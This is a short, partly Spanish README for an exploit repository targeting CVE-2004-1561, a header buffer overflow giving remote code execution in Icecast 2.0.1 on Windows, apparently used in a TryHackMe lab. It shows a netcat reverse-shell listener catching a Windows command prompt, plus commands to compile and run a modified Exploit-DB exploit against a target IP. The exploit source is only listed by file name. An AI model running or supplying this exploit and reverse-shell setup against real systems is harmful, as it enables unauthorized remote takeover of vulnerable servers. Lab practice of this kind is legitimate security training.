# CVE-2004-1561-Icecast-Header-Overwrite-buffer-overflow-RCE-2.0.1-Win32-
## Usage

## Reverse shell listener with Ncat
```bash
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
```
## Usage of 568-edit
Basado en el exploit original [568 Exploit](https://www.exploit-db.com/exploits/568)
```
gcc ./568-edit.c -o 568 & chmod 775 ./568
```
```
./568 127.0.0.1 (Target IP)
```
[4.0K] /data/pocs/1137c8bbb2afb86038f4c3db1e03314b19fea5fc
├── [6.4K] 568-edit.c
├── [4.0K] 568-mod.py
└── [ 700] README.md
0 directories, 3 files